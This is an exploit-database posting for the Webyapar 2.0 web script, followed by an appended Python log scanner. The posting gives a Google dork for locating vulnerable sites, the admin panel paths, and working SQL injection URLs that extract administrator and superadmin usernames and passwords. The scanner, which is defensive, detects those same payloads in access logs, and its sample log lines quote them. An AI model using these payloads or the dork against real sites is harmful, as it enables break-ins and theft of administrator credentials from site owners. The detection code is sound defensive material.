0day.today - Biggest Exploit Database in the World.
Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities
##### TURKISH SECURITY MAN AND C0D3R
##### MAIL    : dumanhack@gmail.com
##### web     :
##### PERFECT C0D3R AND SECURITY
##### MESSAGE : HAYAT ILLEGAL

# Title               : webyapar v2.0 Remote Blind SQL Injection Vulnerability
# AUTHOR              : bypass
# script name         : Webyapar v2.0 { 700$ }
# Language            : Tr
# script web page     : www.webyapar.com
# script bug          : remote SQL injection
# script admin panel1 : http://victim/script_path/yonetim
# script admin panel2 : http://victim/script_path/yonetim2
# google dork         : inurl:"?page=duyurular_detay&id="
# Message (Tr, translated) : My English is not very good. The script sells for 700$ on the market. Besides SQL injection, the script also has XSS vulnerabilities, but the XSS vulnerabilities will not be of much use to you. The admin panels are given at their standard locations...
# Message (Tr)        : Hayat Illegal

------ Example sql bug 1 admin username : ------
http://VICTIM/SCRIPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin

------ Example sql bug 1 admin password : ------
http://VICTIM/SCRIPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin

------ Example sql bug 2 superadmin password and admin username : ------
http://VICTIM/SCRIPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin

SQL injection bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
SQL injection bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin

# 0day.today [2024-12-24] #
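
Added example, not part of the original advisory: a log check that flags requests where the two parameters named above (`kat_id` for `page=download`, `id` for `page=duyurular_detay`) carry anything other than a plain integer. It assumes combined-format access logs and that both parameters are meant to be integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Numeric parameters named in the advisory, keyed by the value of "page".
NUMERIC_PARAMS = {"download": "kat_id", "duyurular_detay": "id"}
# Strict allowlist: a non-negative integer and nothing else (assumption).
INT_RE = re.compile(r"[0-9]{1,10}")
# Pulls the request target out of a combined-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def check_request(target):
    """Return a reason string if the target breaks the allowlist, else None."""
    # parse_qs URL-decodes values, so '+' and %20 both become spaces.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    page = query.get("page", [""])[-1]
    param = NUMERIC_PARAMS.get(page)
    if param is None:
        return None  # not one of the two affected pages
    for value in query.get(param, []):
        if not INT_RE.fullmatch(value):
            return f"{param} for page={page} is not a plain integer: {value!r}"
    return None

def scan(lines):
    """Yield (line_number, reason) for every flagged log line."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            reason = check_request(match.group(1))
            if reason:
                yield number, reason

# Constructed sample log (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /?page=download&kat_id=116 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2025:10:00:05 +0000] "GET /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin HTTP/1.1" 200 734',
    '192.0.2.10 - - [01/Jan/2025:10:00:09 +0000] "GET /?page=duyurular_detay&id=50 HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Jan/2025:10:00:12 +0000] "GET /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin HTTP/1.1" 200 2301',
    '192.0.2.12 - - [01/Jan/2025:10:00:20 +0000] "GET /?page=other&id=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

The same integer allowlist belongs in the application itself, applied before the value reaches the query, together with parameterized statements.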